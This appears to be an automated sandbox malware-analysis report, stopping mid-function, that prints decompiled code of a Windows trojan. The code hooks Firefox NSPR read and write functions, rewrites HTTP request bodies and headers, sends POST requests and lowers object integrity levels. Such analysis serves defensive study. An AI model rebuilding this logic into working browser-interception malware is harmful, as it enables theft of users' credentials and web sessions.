    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad$CreateThread
    • String ID: .dat$Start$TakeBotGuid
    • API String ID: 2597769491-2828610659
    • Opcode ID: 310e0c152d5da7a0b19c4bf47972c06e166e51ab3e462f7fcdbfea41c0d430ef
    • Instruction ID: 550d53b3346e4f77aad25b36c1a4238f44f39af4c6e7829ff6fab87b37f339fd
    • Opcode Fuzzy Hash: 310e0c152d5da7a0b19c4bf47972c06e166e51ab3e462f7fcdbfea41c0d430ef
    • Instruction Fuzzy Hash: 3851B030A20256DFDB28EF74FCE49FD3BA6EF54390B10062DE52597295DB348965CB80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012CE62B(void* __eax, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
    				char _v5;
    				signed char _v12;
    				struct tagRECT _v28;
    				void* __esi;
    				signed char _t39;
    				char _t40;
    				intOrPtr _t42;
    				intOrPtr _t43;
    				RECT* _t80;
    				void* _t81;
    
    				_t80 = __edi;
    				_t81 = __eax;
    				_t39 = L012B1956(_a4) & 0x0000ffff;
    				_v12 = _t39;
    				if((_t39 & 0x00000001) == 0) {
    					_t40 = L012B11CC(_t81, _a4);
    					_v5 = _t40;
    					if(_t40 == 0 || (_v12 & 0x00000010) != 0) {
    						L6:
    						if(E012CE4CE(_t81) == 0) {
    							L12:
    							_t42 = _a8;
    							if(( *(_t42 + 0x24) & 0x40000000) == 0) {
    								IntersectRect( &_v28, _t42 + 4, _t80);
    								FillRect( *(_t81 + 0x154),  &_v28, 6);
    								DrawEdge( *(_t81 + 0x154),  &_v28, 0xa, 0xf);
    							}
    							goto L14;
    						}
    						L012B1947( *((intOrPtr*)(_t81 + 0x10)) + 0x114, _t80, 0x10);
    						ResetEvent( *(_t81 + 0xc));
    						if(PostThreadMessageW( *(_t81 + 0x188),  *(_t81 + 8), 0xfffffffc, _a4) == 0) {
    							goto L12;
    						}
    						if(WaitForSingleObject( *(_t81 + 0xc), 0x3e8) != 0) {
    							TerminateProcess( *(_t81 + 0x17c), 0);
    							L012B11D1(_t81 + 0x17c);
    							goto L12;
    						}
    						if( *((char*)( *((intOrPtr*)(_t81 + 0x10)) + 0x124)) != 1) {
    							goto L12;
    						}
    						_t43 = _v5;
    						goto L15;
    					} else {
    						ResetEvent( *(_t81 + 0xc));
    						if(PostMessageW(_a4,  *(_t81 + 8), (__edi->top & 0x0000ffff) << 0x00000010 |  *__edi & 0x0000ffff, (__edi->bottom & 0x0000ffff) << 0x00000010 | __edi->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t81 + 0xc), 0x64) != 0) {
    							goto L6;
    						} else {
    							L14:
    							_t43 = 1;
    							L15:
    							return _t43;
    						}
    					}
    				}
    				return 1;
    			}

    APIs
    • ResetEvent.KERNEL32(?), ref: 012CE66E
    • PostMessageW.USER32(00000010,00000010,?,?), ref: 012CE691
    • WaitForSingleObject.KERNEL32(?,00000064), ref: 012CE6A0
    • ResetEvent.KERNEL32(?,?,?,00000010), ref: 012CE6CB
    • PostThreadMessageW.USER32 ref: 012CE6DB
    • WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 012CE6ED
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: EventMessageObjectPostResetSingleWait$Thread
    • String ID:
    • API String ID: 4051138640-0
    • Opcode ID: 7317ac2121bd365f5fe53174cee0369d36d4785ea00484300e03265c62c5e07b
    • Instruction ID: 6dd385ce9ffa798457ca3c4bbc4d0af2606bd71d5ef54d2d2adb1fc4569b9db8
    • Opcode Fuzzy Hash: 7317ac2121bd365f5fe53174cee0369d36d4785ea00484300e03265c62c5e07b
    • Instruction Fuzzy Hash: 4631E330510206AFEB215F68ED48FEA7FB8BF04B04F114618FB9ADA191DB31E855DB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E012B5228(void* __ecx, char* __edx, long _a4, void* _a8, long _a12, void _a16) {
    				char* _t17;
    				char* _t20;
    				signed int _t28;
    				void* _t29;
    				char* _t31;
    				long _t32;
    				void* _t33;
    
    				_t31 = __edx;
    				_t29 = __ecx;
    				_t28 = _a16 & 0x00000002;
    				_t32 = 0x8404f700;
    				if(_t28 != 0) {
    					_t32 = 0x8444f700;
    				}
    				if((_a16 & 0x00000004) != 0) {
    					_t32 = _t32 | 0x00800000;
    				}
    				_t17 = "POST";
    				if((_a16 & 0x00000001) == 0) {
    					_t17 = "GET";
    				}
    				_t33 = HttpOpenRequestA(_t29, _t17, _t31, "HTTP/1.1", _a4, 0x12db000, _t32, 0);
    				if(_t33 == 0) {
    					L15:
    					return 0;
    				} else {
    					if(_t28 == 0) {
    						_push(0x13);
    						_t20 = "Connection: close\r\n";
    						_pop(0);
    					} else {
    						_t20 = 0;
    					}
    					if(HttpSendRequestA(_t33, _t20, 0, _a8, _a12) == 0) {
    						L14:
    						InternetCloseHandle(_t33);
    						goto L15;
    					} else {
    						_a16 = _a16 & 0x00000000;
    						_a4 = 4;
    						if(HttpQueryInfoA(_t33, 0x20000013,  &_a16,  &_a4, 0) == 0 || _a16 != 0xc8) {
    							goto L14;
    						} else {
    							return _t33;
    						}
    					}
    				}
    			}

    APIs
    • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,012DB000,8404F700,00000000), ref: 012B526E
    • HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 012B5295
    • HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 012B52BA
    • InternetCloseHandle.WININET(00000000), ref: 012B52D2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
    • String ID: Connection: close$GET$HTTP/1.1$POST
    • API String ID: 3080274660-1621676011
    • Opcode ID: 897be0cb475928f9e8750c3838cac4a6c865fc88ad30f0ca1a37081ec188317c
    • Instruction ID: 858663c9926f2d35c2599906a99ca9b127b576aba08e0236d0149b9dacd1ad85
    • Opcode Fuzzy Hash: 897be0cb475928f9e8750c3838cac4a6c865fc88ad30f0ca1a37081ec188317c
    • Instruction Fuzzy Hash: 6F11B23162221A6FFB218EA8ED89FEB3A5CAF05764F144015FF01EA180D7B4D91087A4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012B178F(struct HINSTANCE__* __ecx) {
    				void* __ebx;
    				_Unknown_base(*)()* _t4;
    				void* _t8;
    				void* _t9;
    				intOrPtr _t12;
    				struct HINSTANCE__* _t13;
    
    				_t13 = __ecx;
    				 *0x12db378 = GetProcAddress(__ecx, "PR_OpenTCPSocket");
    				 *0x12db388 = GetProcAddress(_t13, "PR_Close");
    				 *0x12db398 = GetProcAddress(_t13, "PR_Read");
    				_t4 = GetProcAddress(_t13, "PR_Write");
    				_t8 = 4;
    				 *0x12db3a8 = _t4;
    				_t9 = E012CFC35(_t8, 0xffffffff, 0x12db378, _t8);
    				if(_t9 != 0) {
    					_t12 =  *0x12db380; // 0x0
    					E012B1352(_t13, _t12,  *0x12db390,  *0x12db3a0,  *0x12db3b0);
    				}
    				return _t9;
    			}










    APIs
    • GetProcAddress.KERNEL32(?,PR_OpenTCPSocket), ref: 012CFF6E
    • GetProcAddress.KERNEL32(?,PR_Close), ref: 012CFF7B
    • GetProcAddress.KERNEL32(?,PR_Read), ref: 012CFF88
    • GetProcAddress.KERNEL32(?,PR_Write), ref: 012CFF95
      • Part of subcall function 012B1352: InitializeCriticalSection.KERNEL32(012DD2E4), ref: 012C681D
      • Part of subcall function 012B1352: GetProcAddress.KERNEL32(?,PR_GetNameForIdentity), ref: 012C6856
      • Part of subcall function 012B1352: GetProcAddress.KERNEL32(PR_SetError), ref: 012C6868
      • Part of subcall function 012B1352: GetProcAddress.KERNEL32(PR_GetError), ref: 012C687A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: AddressProc$CriticalInitializeSection
    • String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
    • API String ID: 2804437462-3954199073
    • Opcode ID: 73a1b555a14a0458211a526f6c0913049c5f2f93df6955e78ac91e11fcc2d50d
    • Instruction ID: e2e195648609c0d96450e968f006a70549136224732198d4f28a85d7f2aacbea
    • Opcode Fuzzy Hash: 73a1b555a14a0458211a526f6c0913049c5f2f93df6955e78ac91e11fcc2d50d
    • Instruction Fuzzy Hash: 55F0A471EA23157BCB705B26FC99C663F69EB939A0325011FF90457158CDB14400AB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E012C6FE0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				signed int _v8;
    				char _v12;
    				void* _v16;
    				signed int _v20;
    				char _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				signed char _v48;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t104;
    				signed int _t106;
    				signed int _t117;
    				signed int _t119;
    				void* _t139;
    				void* _t146;
    				struct _CRITICAL_SECTION* _t152;
    				intOrPtr _t154;
    				void* _t169;
    				void* _t174;
    				char* _t180;
    				signed int _t186;
    				signed int _t188;
    				signed int _t190;
    				void* _t192;
    				intOrPtr _t196;
    				intOrPtr _t198;
    				signed int _t199;
    				signed int _t201;
    				signed int _t202;
    
    				_t104 = L012B150A();
    				_t196 = _a4;
    				if(_t104 == 0 || _a8 == 0 || _a12 <= 0) {
    					L41:
    					return  *0x12dd308(_t196, _a8, _a12);
    				} else {
    					_t152 = 0x12dd2e4;
    					EnterCriticalSection(0x12dd2e4);
    					_t106 = E012C63A9(_t196);
    					if(_t106 == 0xffffffff) {
    						L40:
    						LeaveCriticalSection(_t152);
    						goto L41;
    					}
    					_t186 = _t106 * 0x38 +  *0x12dd300;
    					if( *((intOrPtr*)(_t186 + 0x30)) > 0) {
    						L31:
    						_t198 =  *((intOrPtr*)(_t186 + 0x30)) -  *((intOrPtr*)(_t186 + 0x34));
    						__eflags = _a12 - _t198;
    						if(_a12 < _t198) {
    							_t198 = _a12;
    						}
    						_t90 = _t186 + 0x2c; // -19780308
    						_v20 = _t90;
    						L012B1947(_a8,  *_t90 +  *((intOrPtr*)(_t186 + 0x34)), _t198);
    						 *((intOrPtr*)(_t186 + 0x34)) =  *((intOrPtr*)(_t186 + 0x34)) + _t198;
    						__eflags =  *((intOrPtr*)(_t186 + 0x34)) -  *((intOrPtr*)(_t186 + 0x30));
    						if( *((intOrPtr*)(_t186 + 0x34)) ==  *((intOrPtr*)(_t186 + 0x30))) {
    							L012B1933( *_v20);
    							_t174 = 0xc;
    							L012B19F6(_v20, _t174);
    						}
    						LeaveCriticalSection(_t152);
    						return _t198;
    					}
    					if( *((intOrPtr*)(_t186 + 0x10)) <= 0) {
    						goto L40;
    					}
    					LeaveCriticalSection(0x12dd2e4);
    					_t117 =  *0x12dd308(_t196, _a8, _a12);
    					_v8 = _t117;
    					if(_t117 <= 0xffffffff) {
    						L39:
    						return _v8;
    					}
    					EnterCriticalSection(0x12dd2e4);
    					_t119 = E012C63A9(_t196);
    					_t188 = _t119;
    					if(_t188 == 0xffffffff) {
    						L36:
    						_push(8);
    						_push(0xffffe890);
    						L37:
    						 *0x12dd2e0();
    						_v8 = _v8 | 0xffffffff;
    						L38:
    						LeaveCriticalSection(_t152);
    						goto L39;
    					}
    					_t199 = _v8;
    					if(_t199 == 0) {
    						L10:
    						_t190 = _t188 * 0x38 +  *0x12dd300;
    						_v20 = _t190;
    						if(_t199 > 0) {
    							L012B1947( *((intOrPtr*)(_t190 + 0x14)) +  *((intOrPtr*)(_t190 + 0x18)), _a8, _t199);
    							 *((intOrPtr*)(_t190 + 0x18)) =  *((intOrPtr*)(_t190 + 0x18)) + _t199;
    						}
    						_t201 = E012C6C46(_t155,  &_v48,  *((intOrPtr*)(_t190 + 0x14)),  *((intOrPtr*)(_t190 + 0x18)));
    						if(_t201 == 1) {
    							_t201 = E012C6E00( *((intOrPtr*)(_t190 + 0x14)),  *((intOrPtr*)(_t190 + 0x18)),  &_v48, ( &_v16 & 0xffffff00 | _v8 == 0x00000000) & 0x000000ff,  &_v16,  &_v12);
    							if(_t201 == 1) {
    								_t202 = _v20;
    								_push( *((intOrPtr*)(_t202 + 0x10)));
    								_push( *((intOrPtr*)(_t202 + 0xc)));
    								_push( &_v12);
    								if(L012B17EE( *((intOrPtr*)(_t202 + 4)),  &_v16) != 0) {
    									_t154 = L012B1C17( *((intOrPtr*)(_t202 + 0x18)) - _v36 + _v40 + _v12 + 0x14);
    									if(_t154 != 0) {
    										L012B1947(_t154,  *((intOrPtr*)(_t202 + 0x14)), _v40);
    										if((_v48 & 0x00000002) == 0) {
    											L012B182F(_v12,  &_v32, 0xa, 0);
    											_t139 = L012B195B(_t154, _v40, "Content-Length",  &_v32);
    											_push(_v12);
    											_t180 = _v16;
    											_t169 = _t154 + _t139;
    										} else {
    											_t146 = L012B10A0(L012B1BA9(_v40 + _t154, 0xd, "%x\r\n", _v12) + _v40 + _t154, _v16, _v12);
    											_push(7);
    											_t180 = "\r\n0\r\n\r\n";
    											_t169 = _t146;
    										}
    										_t192 = L012B10A0(_t169, _t180);
    										_t141 =  *((intOrPtr*)(_t202 + 0x18));
    										if(_v36 !=  *((intOrPtr*)(_t202 + 0x18))) {
    											_t192 = L012B10A0(_t192,  *((intOrPtr*)(_t202 + 0x14)) + _v36, _t141 - _v36);
    										}
    										L012B1933( *((intOrPtr*)(_t202 + 0x14)));
    										 *((intOrPtr*)(_t202 + 0x14)) = _t154;
    										 *((intOrPtr*)(_t202 + 0x18)) = _t192 - _t154;
    									}
    								}
    								_t201 = _t202 | 0xffffffff;
    								L012B1933(_v16);
    							}
    							_t190 = _v20;
    							_t152 = 0x12dd2e4;
    						}
    						if(_v8 <= 0) {
    							L28:
    							if(__eflags == 0) {
    								L30:
    								 *((intOrPtr*)(_t190 + 0x2c)) =  *((intOrPtr*)(_t190 + 0x14));
    								 *((intOrPtr*)(_t190 + 0x30)) =  *((intOrPtr*)(_t190 + 0x18));
    								 *((intOrPtr*)(_t190 + 0x34)) = 0;
    								 *((intOrPtr*)(_t190 + 0x14)) = 0;
    								 *((intOrPtr*)(_t190 + 0x18)) = 0;
    								L012B1A64( *(_t190 + 0xc),  *(_t190 + 0x10));
    								 *(_t190 + 0x10) =  *(_t190 + 0x10) & 0x00000000;
    								_t83 = _t190 + 0xc;
    								 *_t83 =  *(_t190 + 0xc) & 0x00000000;
    								__eflags =  *_t83;
    								_t186 = _v20;
    								goto L31;
    							}
    							__eflags = _t201 - 0xffffffff;
    							if(_t201 != 0xffffffff) {
    								goto L38;
    							}
    							goto L30;
    						} else {
    							if(_t201 != 0) {
    								__eflags = _v8;
    								goto L28;
    							}
    							_push(0);
    							_push(0xffffe892);
    							goto L37;
    						}
    					}
    					_t13 =  *0x12dd300 + 0x14; // 0x14
    					_t155 = _t119 * 0x38 + _t13;
    					if(L012B1C26(_t119 * 0x38 + _t13,  *((intOrPtr*)(_t119 * 0x38 +  *0x12dd300 + 0x18)) + _t199) == 0) {
    						goto L36;
    					}
    					goto L10;
    				}
    			}



































    APIs
    • EnterCriticalSection.KERNEL32(012DD2E4), ref: 012C7013
    • LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C7047
    • EnterCriticalSection.KERNEL32(012DD2E4), ref: 012C706A
    • LeaveCriticalSection.KERNEL32(012DD2E4,00000000,?,?), ref: 012C7293
    • LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C72B1
    • LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C72BD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CriticalSection$Leave$Enter
    • String ID: 0$%x$Content-Length
    • API String ID: 2978645861-3838797520
    • Opcode ID: f56b17ab83faa68ddce2a00577a03754d2da51b23ff4fb8e45e33c18f4629a73
    • Instruction ID: ec2bbb2529783f2314a5aa526f6175b9be630cc89f08078e65bb01889b06b983
    • Opcode Fuzzy Hash: f56b17ab83faa68ddce2a00577a03754d2da51b23ff4fb8e45e33c18f4629a73
    • Instruction Fuzzy Hash: E691E232D1060AEFCF10DFA8D984AADB7B6FF54710F104618EA11A7291DB30EA65CF91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 51%
    			E012B7056(void* __ecx, void* __edx, struct _ACL* _a4) {
    				char _v5;
    				struct _SECURITY_DESCRIPTOR* _v12;
    				int _v16;
    				int _v20;
    				char* _t14;
    				int _t19;
    				void* _t27;
    				void* _t28;
    
    				_t28 = __edx;
    				_t27 = __ecx;
    				_v5 = 0;
    				L012B19C9(L"SeSecurityPrivilege", 1);
    				_t14 = L"S:(ML;CIOI;NRNWNX;;;LW)";
    				if(_a4 == 0) {
    					_t14 = L"S:(ML;;NRNWNX;;;LW)";
    				}
    				_push(0);
    				_push( &_v12);
    				_push(1);
    				_push(_t14);
    				L012D23E8();
    				if(_t14 != 0) {
    					_a4 = 0;
    					_t19 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_a4,  &_v16);
    					if(_t19 != 0) {
    						__imp__SetNamedSecurityInfoW(_t27, _t28, 0x10, 0, 0, 0, _a4);
    						if(_t19 == 0) {
    							_v5 = 1;
    						}
    					}
    					LocalFree(_v12);
    				}
    				return _v5;
    			}












    APIs
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 012B708B
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 012B70A6
    • SetNamedSecurityInfoW.ADVAPI32(?,?,00000010,00000000,00000000,00000000,?), ref: 012B70BA
    • LocalFree.KERNEL32(?), ref: 012B70CB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
    • String ID: S:(ML;;NRNWNX;;;LW)$S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
    • API String ID: 173816248-2010866413
    • Opcode ID: dba9fa947e12f735767e90c065200a199269594e2a623f39587c5f8920a6ac94
    • Instruction ID: b91506ada377b11f62f68f6e615eb162f6719a380f2807f96c65561106a83ce2
    • Opcode Fuzzy Hash: dba9fa947e12f735767e90c065200a199269594e2a623f39587c5f8920a6ac94
    • Instruction Fuzzy Hash: 2901D6759142497BDB119BA8DCC8EEF7F6CEF45384F004466FA41A7180D67299488760
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012B1352(struct HINSTANCE__* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				_Unknown_base(*)()* _t9;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t16;
    
    				 *0x12dd300 =  *0x12dd300 & 0x00000000;
    				 *0x12dd304 =  *0x12dd304 & 0x00000000;
    				_t13 = __edx;
    				_t16 = __ecx;
    				InitializeCriticalSection(0x12dd2e4);
    				 *0x12dd2d8 = _a4;
    				 *0x12dd308 = _a8;
    				 *0x12dd2dc = _t16;
    				 *0x12dd2fc = _t13;
    				 *0x12dd2d4 = _a12;
    				 *0x12dd2d0 = GetProcAddress(_t16, "PR_GetNameForIdentity");
    				 *0x12dd2e0 = GetProcAddress( *0x12dd2dc, "PR_SetError");
    				_t9 = GetProcAddress( *0x12dd2dc, "PR_GetError");
    				 *0x12dd2cc = _t9;
    				return _t9;
    			}







    APIs
    • InitializeCriticalSection.KERNEL32(012DD2E4), ref: 012C681D
    • GetProcAddress.KERNEL32(?,PR_GetNameForIdentity), ref: 012C6856
    • GetProcAddress.KERNEL32(PR_SetError), ref: 012C6868
    • GetProcAddress.KERNEL32(PR_GetError), ref: 012C687A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: AddressProc$CriticalInitializeSection
    • String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
    • API String ID: 2804437462-2578621715
    • Opcode ID: 1cea9706a80ce3628afd462049d1e431d356dff1e8d8d23cfb38f3e6f0b24b54
    • Instruction ID: 8573bcbb884e94bfd307ccb37d45fac666a37e13d13fd37b9a274453c7d8567b
    • Opcode Fuzzy Hash: 1cea9706a80ce3628afd462049d1e431d356dff1e8d8d23cfb38f3e6f0b24b54
    • Instruction Fuzzy Hash: 6701E471D53B189FC720DFAAF80CA06BFA4FB58671F01491BE4048329ADB709400CF81
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012D0CDB(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr* _a4) {
    				signed int _v8;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				char _v84;
    				signed int _v88;
    				signed int _v92;
    				signed int _v96;
    				signed char _v97;
    				intOrPtr _v104;
    				char _v132;
    				char _v140;
    				char _v164;
    				void* _v168;
    				intOrPtr* _v172;
    				signed int _t118;
    				signed char _t119;
    				signed int _t152;
    
    				_v172 = __edx;
    				_v168 = __ecx;
    				_v8 = _v8 | 0xffffffff;
    				if((E012D11E2( &_v84, _v168, __eflags,  *_v172,  *_a4) & 0x000000ff) == 0) {
    					L21:
    					L012B114A( &_v84);
    					return _v8;
    				}
    				_v88 = L012B132A( &_v84);
    				if((_v88 & 0x00000001) == 0) {
    					__eflags = _v88 & 0x00000002;
    					if((_v88 & 0x00000002) == 0) {
    						L17:
    						__eflags = _v88 & 0x00000004;
    						if(__eflags != 0) {
    							 *_v172 = _v48;
    							 *_a4 = _v44;
    							EnterCriticalSection(0x12dda14);
    							_v92 = E012D101C(_v168, __eflags);
    							__eflags = _v92 - 0xffffffff;
    							if(_v92 != 0xffffffff) {
    								L012B1933( *((intOrPtr*)( *0x12dda2c + 8 + _v92 * 0x24)));
    								_t118 = _v92 * 0x24;
    								__eflags = _t118;
    								 *((intOrPtr*)( *0x12dda2c + _t118 + 8)) = _v48;
    							}
    							LeaveCriticalSection(0x12dda14);
    						}
    						goto L21;
    					}
    					_v97 = 1;
    					_v96 = _v96 & 0x00000000;
    					_t119 = L012B11BD(_v28, _v24);
    					__eflags = _t119 & 0x000000ff;
    					if((_t119 & 0x000000ff) == 0) {
    						L012B165E(0x22,  &_v132);
    						HttpAddRequestHeadersA(_v168,  &_v132, 0xffffffff, 0xa0000000);
    						L012B165E(0x23,  &_v140);
    						HttpAddRequestHeadersA(_v168,  &_v140, 0xffffffff, 0x80000000);
    						L012B165E(0x24,  &_v164);
    						HttpAddRequestHeadersA(_v168,  &_v164, 0xffffffff, 0x80000000);
    					} else {
    						_v104 = _v28;
    						_v96 = L012B1280( &_v84, _v104);
    						__eflags = _v96;
    						if(_v96 != 0) {
    							_v8 = 1;
    						} else {
    							_v97 = 0;
    						}
    					}
    					EnterCriticalSection(0x12dda14);
    					__eflags = _v97 & 0x000000ff;
    					if(__eflags == 0) {
    						L12:
    						L012B1A64(_v28, _v24);
    						__eflags = _v96;
    						if(_v96 != 0) {
    							L012B17A8(_v96);
    						}
    						goto L16;
    					} else {
    						_v92 = E012D101C(_v168, __eflags);
    						__eflags = _v92 - 0xffffffff;
    						if(_v92 != 0xffffffff) {
    							L012B1A64( *((intOrPtr*)( *0x12dda2c + 0xc + _v92 * 0x24)),  *((intOrPtr*)( *0x12dda2c + 0x10 + _v92 * 0x24)));
    							L012B1933( *( *0x12dda2c + 0x14 + _v92 * 0x24));
    							 *( *0x12dda2c + 0x14 + _v92 * 0x24) =  *( *0x12dda2c + 0x14 + _v92 * 0x24) & 0x00000000;
    							 *( *0x12dda2c + 0x1c + _v92 * 0x24) =  *( *0x12dda2c + 0x1c + _v92 * 0x24) & 0x00000000;
    							 *( *0x12dda2c + 0x18 + _v92 * 0x24) =  *( *0x12dda2c + 0x18 + _v92 * 0x24) | 0xffffffff;
    							 *((intOrPtr*)( *0x12dda2c + 0xc + _v92 * 0x24)) = _v28;
    							 *((intOrPtr*)( *0x12dda2c + 0x10 + _v92 * 0x24)) = _v24;
    							_t152 = _v92 * 0x24;
